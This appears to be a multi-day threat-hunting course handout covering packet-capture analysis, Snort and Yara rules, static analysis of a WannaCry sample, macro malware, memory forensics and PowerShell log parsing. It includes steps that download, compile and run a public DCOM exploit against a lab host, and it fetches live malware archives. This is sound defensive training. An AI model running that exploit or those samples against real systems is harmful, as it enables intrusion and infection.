1 #####################################
2----------- ############### # Day 1: Threat Hunting on the wire ################ -----------
3 #####################################
4
5
6###################################
7# Setting up your virtual machine #
8# Note: run as root user #
9###################################
10
11
Here is where we will set up all of the required dependencies for the tools we plan to install.
13---------------------------Type this as root--------------------------
14apt update
15apt-get install -y libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev zlib1g-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make gcc g++ flex bison libpcap-dev libssl-dev unzip python-dev swig zlib1g-dev sendmail sendmail-bin prads tcpflow python-scapy python-yara tshark whois jq
16-----------------------------------------------------------------------
17
18
19
20
21Now we install Suricata
22---------------------------Type this as root-------------------------------
23wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz
24
25tar -zxvf suricata-4.0.5.tar.gz
26
27cd suricata-4.0.5
28
29./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var
30
31make
32
33make install
34
35make install-conf
36
37cd rules
38
39cp *.rules /etc/suricata/rules/
40
41cd /etc/suricata/
42
43wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz
44
45tar -zxvf emerging.rules.tar.gz
46-----------------------------------------------------------------------
47
48
49
50
51
52##################################################################
53# Analyzing a PCAP Prads #
54# Note: run as regular user #
55##################################################################
56
57---------------------------Type this as a regular user----------------------------------
58cd ~/pcap_analysis/prads
59
60wget http://45.63.104.73/suspicious-time.pcap
61
62prads -r suspicious-time.pcap -l prads-asset.log
63
64cat prads-asset.log | less
65
66cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
67
68cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
69
70cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
71-----------------------------------------------------------------------
72
73
74
75
76##################################
77# PCAP Analysis with ChaosReader #
78# Note: run as regular user #
79##################################
80---------------------------Type this as a regular user----------------------------------
81cd ~/pcap_analysis/chaos_reader/
82
83wget http://45.63.104.73/suspicious-time.pcap
84
85wget http://45.63.104.73/chaosreader.pl
86
87perl chaosreader.pl suspicious-time.pcap
88
89cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
90
91cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
92
93
94for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
95
96
97------------------------------------------------------------------------
98
99
100
101
102
103
104
105
106#############################
107# PCAP Analysis with tshark #
108# Note: run as regular user #
109#############################
110---------------------------Type this as a regular user---------------------------------
111cd ~/pcap_analysis/tshark
112
113wget http://45.63.104.73/suspicious-time.pcap
114
115tshark -i ens3 -r suspicious-time.pcap -qz io,phs
116
117tshark -r suspicious-time.pcap -qz ip_hosts,tree
118
119tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
120
121tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
122
123
124tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
125
126whois rapidshare.com.eyu32.ru
127
128whois sploitme.com.cn
129
130tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
131
132tshark -r suspicious-time.pcap -qz http_req,tree
133
134tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
135
136tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
137------------------------------------------------------------------------
138
139
140
141#############################
142# Understanding Snort rules #
143#############################
144Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
145
146Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
147
148Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
149
150Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
151
152Field 5: Traffic Direction (->)
153
154Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
155
156Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
157
Field 8: MSG - the message text that is actually displayed on the analyst's machine
159
160
161Let's look at 2 simple rules
162----------------------------------------------------------------------------------
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator \
bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; \
content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 \
00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; \
reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
168
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivator bind \
attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; \
depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c \
00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; \
distance:0; within:1; content:"|0b|"; distance:1; within:1; \
byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
sid:2193; rev:1;)
177----------------------------------------------------------------------------------
178
179
180
181From your Linux machine ping your Windows machine
182---------------------------Type This-----------------------------------
183ping 192.168.150.1
184-----------------------------------------------------------------------
185
186
187Start wireshark and let's create some simple filters:
188
189Filter 1:
190ip.addr==192.168.150.1
191-----------------------------------------------------------------------
192
193Filter 2:
194ip.addr==192.168.150.1 && icmp
195-----------------------------------------------------------------------
196
197
198Filter 3:
199ip.addr==192.168.150.1 && !(tcp.port==22)
200-----------------------------------------------------------------------
201Now stop your capture and restart it (make sure you keep the filter)
202
203
204
205
206Back to your Linux machine:
207[ CTRL-C ] - to stop your ping
208
209wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
210
211
212gcc -o exploit oc192-dcom.c
213
214./exploit
215
216
217./exploit -d 192.168.150.1 -t 0
218-----------------------------------------------------------------------
219
220
221
222Now go back to WireShark and stop the capture.
223
224
225
226
227
228###############################
229# PCAP Analysis with Suricata #
230# Note: run as root #
231###############################
232--------------------------Type this as root--------------------------------
233cd /home/joe/pcap_analysis/
234
235mkdir suricata
236
237cd suricata/
238
239wget http://45.63.104.73/suspicious-time.pcap
240
241mkdir suri
242
243suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/
244
245cd suri/
246
247cat stats.log | less
248
249cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}
250
251cat xx01
252
253cat xx02
254
255cat xx03
256
257cat xx04
258
259cat xx05
260
261cat xx06
262------------------------------------------------------------------------
263
264
265#############################
266# PCAP Analysis with Yara #
267# Note: run as regular user #
268#############################
269-------------------------Type this as a regular user----------------------------------
270cd ~/pcap_analysis/
271
272git clone https://github.com/kevthehermit/YaraPcap.git
273cd YaraPcap/
274wget http://45.63.104.73/suspicious-time.pcap
275wget https://github.com/Yara-Rules/rules/archive/master.zip
276unzip master.zip
277cd rules-master/
278ls
279cat index.yar
280clear
281./index_gen.sh
282cd ..
283mkdir matching_files/
284python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
285whereis tcpflow
286vi yaraPcap.py **** fix line 35 with correct path to tcpflow ****:q!
287python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
288cd matching_files/
289ls
290cat report.txt
291------------------------------------------------------------------------
292
293
294
295 ###############################################
296----------- ############### # Day 2: Threat Hunting with Static Analysis ################ -----------
297 ###############################################
298
299
300
301
302###################################
303# Setting up your virtual machine #
304###################################
305
Here is where we will set up all of the required dependencies for the tools we plan to install.
307---------------------------Type This-----------------------------------
308sudo apt update
309sudo apt-get install -y python3-pip python3-dev unzip python3-setuptools ipython3 build-essential python-pefile python2.7 python-pip python-setuptools mysql-server build-dep python-mysqldb python-mysqldb
310
311
312sudo pip install -U olefile
313
314
315git clone https://github.com/Te-k/pe.git
316cd pe
317sudo python3 setup.py install
318pip3 install .
319cd ..
320wget http://45.63.104.73/wannacry.zip
321 infected
322-----------------------------------------------------------------------
323
324
325
326
327################
328# The Scenario #
329################
330You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
331
332
333The fastest thing you can do is perform static analysis.
334
335
336
337###################
338# Static Analysis #
339###################
340
- After logging in, please open a terminal window and type the following commands:
342
343
344---------------------------Type This-----------------------------------
345cd ~
346
347mkdir static_analysis
348
349cd static_analysis
350
351wget http://45.63.104.73/wannacry.zip
352
353unzip wannacry.zip
354 infected
355
356file wannacry.exe
357
358mv wannacry.exe malware.pdf
359
360file malware.pdf
361
362mv malware.pdf wannacry.exe
363
364hexdump -n 2 -C wannacry.exe
365
366----------------------------------------------------------------------
367
368
369***What is '4d 5a' or 'MZ'***
370Reference:
371http://www.garykessler.net/library/file_sigs.html
372
373
374
375
376---------------------------Type This-----------------------------------
377objdump -x wannacry.exe
378
379strings wannacry.exe
380
381strings wannacry.exe | grep -i dll
382
383strings wannacry.exe | grep -i library
384
385strings wannacry.exe | grep -i reg
386
387strings wannacry.exe | grep -i key
388
389strings wannacry.exe | grep -i rsa
390
391strings wannacry.exe | grep -i open
392
393strings wannacry.exe | grep -i get
394
395strings wannacry.exe | grep -i mutex
396
397strings wannacry.exe | grep -i irc
398
399strings wannacry.exe | grep -i join
400
401strings wannacry.exe | grep -i admin
402
403strings wannacry.exe | grep -i list
404----------------------------------------------------------------------
405
406
407
408
409
410---------------------------Type This-----------------------------------
411pe info wannacry.exe
412pe check wannacry.exe
413pe dump --section text wannacry.exe
414pe dump --section data wannacry.exe
415pe dump --section rsrc wannacry.exe
416pe dump --section reloc wannacry.exe
417strings rdata | less
418strings rsrc | less
419strings text | less
420----------------------------------------------------------------------
421
422
423
424
425
426
427
428
429Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
430
Quick Google search for "wannacry ransomware analysis"
432
433
434Reference
435https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
436
437- Yara Rule -
438
439
440Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
447
448
449
450
451
452
453
454
455Ok, let's look for the individual strings
456
457
458---------------------------Type This-----------------------------------
459strings wannacry.exe | grep -i ooops
460
461strings wannacry.exe | grep -i wanna
462
463strings wannacry.exe | grep -i wcry
464
465strings wannacry.exe | grep -i wannacry
466
467strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
468----------------------------------------------------------------------
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485####################################
486# Tired of GREP - let's try Python #
487####################################
Decided to make my own script for this kind of stuff in the future.
489
490Reference1:
491https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
492
493This is a really good script for the basics of static analysis
494
495Reference:
496https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
497
498
499This is really good for showing some good signatures to add to the Python script
500
501
502Here is my own script using the signatures (started this yesterday, but still needs work):
503https://pastebin.com/guxzCBmP
504
505
506
507---------------------------Type This-----------------------------------
508wget https://pastebin.com/raw/guxzCBmP
509
510
511mv guxzCBmP am.py
512
513
514vi am.py
515
516python2.7 am.py wannacry.exe
517----------------------------------------------------------------------
518
519
520
521##############
522# Yara Ninja #
523##############
524
525Reference:
526https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
527
528----------------------------------------------------------------------------
529rule wannacry_1 : ransom
530{
531 meta:
532 author = "Joshua Cannell"
533 description = "WannaCry Ransomware strings"
534 weight = 100
535 date = "2017-05-12"
536
537 strings:
538 $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
539 $s2 = "Wanna Decryptor" wide ascii nocase
540 $s3 = ".wcry" wide ascii nocase
541 $s4 = "WANNACRY" wide ascii nocase
542 $s5 = "WANACRY!" wide ascii nocase
543 $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
544
545 condition:
546 any of them
547}
548
549----------------------------------------------------------------------------
550rule wannacry_2{
551 meta:
552 author = "Harold Ogden"
553 description = "WannaCry Ransomware Strings"
554 date = "2017-05-12"
555 weight = 100
556
557 strings:
558 $string1 = "msg/m_bulgarian.wnry"
559 $string2 = "msg/m_chinese (simplified).wnry"
560 $string3 = "msg/m_chinese (traditional).wnry"
561 $string4 = "msg/m_croatian.wnry"
562 $string5 = "msg/m_czech.wnry"
563 $string6 = "msg/m_danish.wnry"
564 $string7 = "msg/m_dutch.wnry"
565 $string8 = "msg/m_english.wnry"
566 $string9 = "msg/m_filipino.wnry"
567 $string10 = "msg/m_finnish.wnry"
568 $string11 = "msg/m_french.wnry"
569 $string12 = "msg/m_german.wnry"
570 $string13 = "msg/m_greek.wnry"
571 $string14 = "msg/m_indonesian.wnry"
572 $string15 = "msg/m_italian.wnry"
573 $string16 = "msg/m_japanese.wnry"
574 $string17 = "msg/m_korean.wnry"
575 $string18 = "msg/m_latvian.wnry"
576 $string19 = "msg/m_norwegian.wnry"
577 $string20 = "msg/m_polish.wnry"
578 $string21 = "msg/m_portuguese.wnry"
579 $string22 = "msg/m_romanian.wnry"
580 $string23 = "msg/m_russian.wnry"
581 $string24 = "msg/m_slovak.wnry"
582 $string25 = "msg/m_spanish.wnry"
583 $string26 = "msg/m_swedish.wnry"
584 $string27 = "msg/m_turkish.wnry"
585 $string28 = "msg/m_vietnamese.wnry"
586
587
588 condition:
589 any of ($string*)
590}
591----------------------------------------------------------------------------
592
593
594
595
596
597
598
599#####################################################
600# Analyzing Macro Embedded Malware #
601#####################################################
602---------------------------Type This-----------------------------------
603mkdir ~/oledump
604
605cd ~/oledump
606
607wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
608
609unzip oledump_V0_0_22.zip
610
611wget http://45.63.104.73/064016.zip
612
613unzip 064016.zip
614 infected
615
616python oledump.py 064016.doc
617
618python oledump.py 064016.doc -s A4 -v
619 -----------------------------------------------------------------------
620
621
622
623- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
625
626---------------------------Type This-----------------------------------
627python oledump.py 064016.doc -s A5 -v
628-----------------------------------------------------------------------
629
630- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
631
632---------------------------Type This-----------------------------------
633python oledump.py 064016.doc -s A3 -v
634
635- Look for "GVhkjbjv" and you should see:
636
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
638
639- Take that long blob that starts with 636D and finishes with 653B and paste it in:
640http://www.rapidtables.com/convert/number/hex-to-ascii.htm
641-----------------------------------------------------------------------
642
643
644
645###############################
646# Creating a Malware Database #
647###############################
648Creating a malware database (mysql)
649-----------------------------------
650- Step 1: Logging in
651Run the following command in the terminal:
652---------------------------Type This-----------------------------------
653mysql -u root -p (set a password of 'malware')
654
655- Then create one database by running following command:
656
657create database malware;
658
659exit;
660
661wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
662
663vi mal_to_db.py (fill in database connection information)
664
665python mal_to_db.py -i
666
667------- check it to see if the files table was created ------
668
669mysql -u root -p
670 malware
671
672show databases;
673
674use malware;
675
676show tables;
677
678describe files;
679
680exit;
681
682---------------------------------
683
684
685- Now add the malicious file to the DB
686---------------------------Type This-----------------------------------
687python mal_to_db.py -f wannacry.exe -u
688
689
690
691- Now check to see if it is in the DB
692---------------------------Type This-----------------------------------
693mysql -u root -p
694 malware
695
696mysql> use malware;
697
698select id,md5,sha1,sha256,time FROM files;
699
700mysql> quit;
701-----------------------------------------------------------------------
702
703
704
705
706 ###############################################
707----------- ############### # Day 3: Threat hunting with memory analysis ################ -----------
708 ###############################################
709
710
711
712
713
714###################################
715# Setting up your virtual machine #
716###################################
717
Here is where we will set up all of the required dependencies for the tools we plan to install.
719---------------------------Type This-----------------------------------
720apt update
721apt-get install -y foremost tcpxtract python-openpyxl python-ujson python-ujson-dbg python-pycryptopp python-pycryptopp-dbg libdistorm3-3 libdistorm3-dev python-distorm3 volatility volatility-tools
722-----------------------------------------------------------------------
723
724
725
726
727################
728# The Scenario #
729################
730
731
732###################
733# Memory Analysis #
734###################
735---------------------------Type This-----------------------------------
736cd ~/
737
738mkdir mem_analysis
739
740cd mem_analysis
741
742wget http://45.63.104.73/hn_forensics.vmem
743
744volatility pslist -f hn_forensics.vmem
745volatility pslist -f hn_forensics.vmem | awk '{print $2,$3,$4}'
746volatility pslist -f hn_forensics.vmem | awk '{print $2,"\t\t"$3"\t\t","\t\t"$4}'
747volatility connscan -f hn_forensics.vmem
748volatility connscan -f hn_forensics.vmem | grep -E '888|1752'
749
750mkdir malfind/
751mkdir dump/
752mkdir -p output/pdf/
753
754volatility privs -f hn_forensics.vmem
755volatility svcscan -f hn_forensics.vmem
756volatility malfind -f hn_forensics.vmem --dump-dir malfind/
757
758
759volatility -f hn_forensics.vmem memdump -p 888 --dump-dir dump/
760volatility -f hn_forensics.vmem memdump -p 1752 --dump-dir dump/
761
762 ***Takes a few min***
763
764cd dump/
765strings 1752.dmp | grep "^http://" | sort | uniq
766strings 1752.dmp | grep "Ahttps://" | uniq -u
767
768foremost -i 1752.dmp -t pdf -o ../output/pdf/
769cd ../output/pdf/
770cat audit.txt
771cd pdf
772ls
773grep -i javascript *.pdf
774
775
776wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
777unzip pdf-parser_V0_6_4.zip
778python pdf-parser.py -s javascript --raw 00601560.pdf
779python pdf-parser.py --object 11 00601560.pdf
780python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
781
782cat malicious.js
783 -----------------------------------------------------------------------
784
785
786
787 ############################################
788----------- ############### # Day 4: Threat Hunting with log analysis ################ -----------
789 ############################################
790
791#####################
792# Powershell Basics #
793#####################
794
PowerShell is Microsoft's new scripting language and has been built into Windows since the release of Vista.
796
PowerShell script files end in the .ps1 extension.
798
799An important note is that you cannot double click on a PowerShell script to execute it.
800
801To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
802
803------------------------Type This------------------------------
804cd c:\
805dir
806cd
807ls
808---------------------------------------------------------------
809
810
811To obtain a list of cmdlets, use the Get-Command cmdlet
812------------------------Type This------------------------------
813Get-Command
814---------------------------------------------------------------
815
816
817You can use the Get-Alias cmdlet to see a full list of aliased commands.
818------------------------Type This------------------------------
819Get-Alias
820---------------------------------------------------------------
821
822
823Don't worry you won't blow up your machine with Powershell
824------------------------Type This------------------------------
Get-Process | stop-process        (Don't press [ ENTER ] - what would this command do?)
826Get-Process | stop-process -whatif
827---------------------------------------------------------------
828
829To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
830------------------------Type This------------------------------
831Get-Help Get-Command
832
Get-Help Get-Service -online
834
835Get-Service -Name TermService, Spooler
836
Get-Service -N BITS
838---------------------------------------------------------------
839
840
841
842
843
- Run a cmdlet's output through a pipe and refer to the current object's properties as $_
845------------------------Type This------------------------------
846Get-Service | where-object { $_.Status -eq "Running"}
847---------------------------------------------------------------
848
849
850
- PowerShell variables begin with the $ symbol. First let's create a variable
852------------------------Type This------------------------------
$serv = Get-Service -N Spooler
854---------------------------------------------------------------
855
856To see the value of a variable you can just call it in the terminal.
857------------------------Type This------------------------------
858$serv
859
860$serv.gettype().fullname
861---------------------------------------------------------------
862
863
Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in with -InputObject.
865------------------------Type This------------------------------
866$serv | Get-Member
867
868Get-Member -InputObject $serv
869---------------------------------------------------------------
870
871
872
873
874Let's use a method and a property with our object.
875------------------------Type This------------------------------
876$serv.Status
877$serv.Stop()
878$serv.Refresh()
879$serv.Status
880$serv.Start()
881$serv.Refresh()
882$serv.Status
883---------------------------------------------------------------
884
885
886If you want some good command-line shortcuts you can check out the following link:
887https://technet.microsoft.com/en-us/library/ff678293.aspx
888
889#############################
890# Simple Event Log Analysis #
891#############################
892
893Step 1: Dump the event logs
894---------------------------
895The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
896
To dump the event log, you can use the Get-EventLog and the Export-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
If you need to work with one of the trace logs, use the Get-WinEvent and the Export-Clixml cmdlets.
899------------------------Type This------------------------------
900Get-EventLog -LogName application | Export-Clixml Applog.xml
901
902type .\Applog.xml
903
904$logs = "system","application","security"
905---------------------------------------------------------------
906
907
908The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
909------------------------Type This------------------------------
910$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
911---------------------------------------------------------------
912
913
914
915
916Step 2: Import the event log of interest
917----------------------------------------
918To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
919Store the results in a variable.
Let's take a look at the cmdlets Where-Object, Group-Object, and Select-Object.
921
922The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
923------------------------Type This------------------------------
924$seclog = Import-Clixml security.xml
925
926$seclog | select -Last 5
927---------------------------------------------------------------
928
929Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
930------------------------Type This------------------------------
931Get-EventLog Application -After (Get-Date).AddDays(-1)
932---------------------------------------------------------------
You can use '-after' and '-before' to filter date ranges.
934
One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NTFS and share permissions that are assigned to the location where you store it.
936By default, an ordinary user does not have permission to read the security log.
937
938
939
940
941Step 3: Drill into a specific entry
942-----------------------------------
943To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
944
945------------------------Type This------------------------------
946$seclog | select -first 1 | fl *
947---------------------------------------------------------------
948
949The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
950
951------------------------Type This------------------------------
952($seclog | select -first 1).message
953
954(($seclog | select -first 1).message).gettype()
955---------------------------------------------------------------
956
957
958In the *nix world you often want a count of something (wc -l).
959How often is the SeSecurityPrivilege privilege mentioned in the message property?
960To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
961------------------------Type This------------------------------
962$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
963---------------------------------------------------------------
To see which event IDs the entries containing SeSecurityPrivilege fall under, use Group-Object to group the matches by the EventID property.
965
966------------------------Type This------------------------------
967$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
968---------------------------------------------------------------
969
Because importing the stored XML into a variable yields a collection of event log entries, the Count property is also available on that variable.
971Use the count property to determine the total number of entries in the event log.
972------------------------Type This------------------------------
973$seclog.Count
974---------------------------------------------------------------
975
976
977
978
979
980############################
981# Simple Log File Analysis #
982############################
983
984
You'll need to create the directory c:\ps and download the sample IIS log http://pastebin.com/raw.php?i=LBn64cyA
986
987------------------------Type This------------------------------
# Create the working directory and fetch the two sample logs into it.
# NOTE(review): both downloads use plain HTTP, so the content is neither
# authenticated nor integrity-checked — treat the files as untrusted input.
New-Item -ItemType Directory -Path 'c:\ps'
Set-Location 'c:\ps'
$web = New-Object System.Net.WebClient
$web.DownloadFile('http://pastebin.com/raw.php?i=LBn64cyA', 'c:\ps\u_ex1104.log')
$web.DownloadFile('http://pastebin.com/raw.php?i=ysnhXxTV', 'c:\ps\CiscoLogFileExamples.txt')
# Select-String treats the pattern as a regex, so each '.' also matches any
# single character; -SimpleMatch would make the search literal.
Select-String -Pattern '192.168.208.63' -Path '.\CiscoLogFileExamples.txt'
993---------------------------------------------------------------
994
995
996
997The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
998------------------------Type This------------------------------
# Keep only the matched text lines, dropping the file/line-number decoration.
Select-String -Pattern '192.168.208.63' -Path '.\CiscoLogFileExamples.txt' | Select-Object Line
1000---------------------------------------------------------------
1001
1002
1003
1004To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
1005------------------------Type This------------------------------
# Number of log lines that mention the host.
Select-String -Pattern '192.168.208.63' -Path '.\CiscoLogFileExamples.txt' |
  Select-Object Line |
  Measure-Object
1007---------------------------------------------------------------
1008
1009
1010To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
1011------------------------Type This------------------------------
# Count the distinct dotted-quad strings in the file. \d{1,3} accepts any
# 0-999 group, so this is a loose IPv4 pattern, not a strict validator.
$ipv4_pattern = '\b(?:\d{1,3}\.){3}\d{1,3}\b'
Select-String -Pattern $ipv4_pattern -Path '.\CiscoLogFileExamples.txt' |
  Select-Object -ExpandProperty Matches |
  Select-Object -ExpandProperty Value |
  Sort-Object -Unique |
  Measure-Object
1013---------------------------------------------------------------
1014
1015
1016Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
1017------------------------Type This------------------------------
# List the distinct dotted-quad strings themselves (same pipeline, no count).
$ipv4_pattern = '\b(?:\d{1,3}\.){3}\d{1,3}\b'
Select-String -Pattern $ipv4_pattern -Path '.\CiscoLogFileExamples.txt' |
  Select-Object -ExpandProperty Matches |
  Select-Object -ExpandProperty Value |
  Sort-Object -Unique
1019---------------------------------------------------------------
1020
1021In order to determine which IP addresses have the most communication, the last commands are removed so that the value of each match is retained. Then the group command is issued on the piped output to group all the IP addresses (value), and the objects are sorted using the alias for Sort-Object: sort count -des.
1022This sorts the IP addresses by count in descending order and delivers the output to the shell.
1023------------------------Type This------------------------------
# Rank addresses by how often they appear: group on the matched value, then
# sort the groups by size, largest first.
$ipv4_pattern = '\b(?:\d{1,3}\.){3}\d{1,3}\b'
Select-String -Pattern $ipv4_pattern -Path '.\CiscoLogFileExamples.txt' |
  Select-Object -ExpandProperty Matches |
  Select-Object Value |
  Group-Object Value |
  Sort-Object Count -Descending
1025---------------------------------------------------------------
1026
1027
1028
1029##############################################
1030# Parsing Log files using windows PowerShell #
1031##############################################
1032
1033Download the sample IIS log http://pastebin.com/LBn64cyA
1034
1035------------------------Type This------------------------------
# Fetch the sample IIS log (plain HTTP, unauthenticated — treat as untrusted
# input), then print every line of every *log file in the directory that
# mentions WebDAV.
$web = New-Object System.Net.WebClient
$web.DownloadFile('http://pastebin.com/raw.php?i=LBn64cyA', 'c:\ps\u_ex1104.log')

Get-Content '.\*log' | Where-Object { $_ | Select-String 'WebDAV' }
1039---------------------------------------------------------------
1040
1041
1042The above command would give us all the WebDAV requests.
1043
1044To filter this to a particular user name, use the below command:
1045------------------------Type This------------------------------
# Narrow the WebDAV lines to those that also contain OPTIONS.
Get-Content '.\*log' |
  Where-Object { ($_ | Select-String 'WebDAV') -and ($_ | Select-String 'OPTIONS') }
1047---------------------------------------------------------------
1048
1049
1050Some more variants that are commonly required:
1051
1052For Outlook Web Access : Replace WebDAV with OWA
1053
1054For EAS : Replace WebDAV with Microsoft-server-activesync
1055
1056For ECP : Replace WebDAV with ECP
1057
1058
1059
1060
1061
1062
1063
1064####################################################################
1065# Windows PowerShell: Extracting Strings Using Regular Expressions #
1066####################################################################
1067
1068
1069Regex Characters you might run into:
1070
1071^ Start of string, or start of line in a multiline pattern
1072$ End of string, or end of line in a multiline pattern
1073\b Word boundary
1074\d Digit
1075\ Escape the following character
1076* 0 or more {3} Exactly 3
1077+ 1 or more {3,} 3 or more
1078? 0 or 1 {3,5} 3, 4 or 5
1079
1080
1081
1082To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
1083
10841) The input file that will be parsed
1085------------------------Type This------------------------------
# Download the three input files used by the extraction examples below.
# NOTE(review): plain-HTTP downloads — no authentication or integrity check
# on the content; handle the files as untrusted input.
$web = New-Object System.Net.WebClient
$web.DownloadFile('http://pastebin.com/raw.php?i=rDN3CMLc', 'c:\ps\emails.txt')
$web.DownloadFile('http://pastebin.com/raw.php?i=XySD8Mi2', 'c:\ps\ip_addresses.txt')
$web.DownloadFile('http://pastebin.com/raw.php?i=v5Yq66sH', 'c:\ps\URL_addresses.txt')
1089---------------------------------------------------------------
10902) The regular expression that the input file will be compared against
1091
10923) The output file for where the extracted data will be placed.
1093
1094Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
1095Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
1096
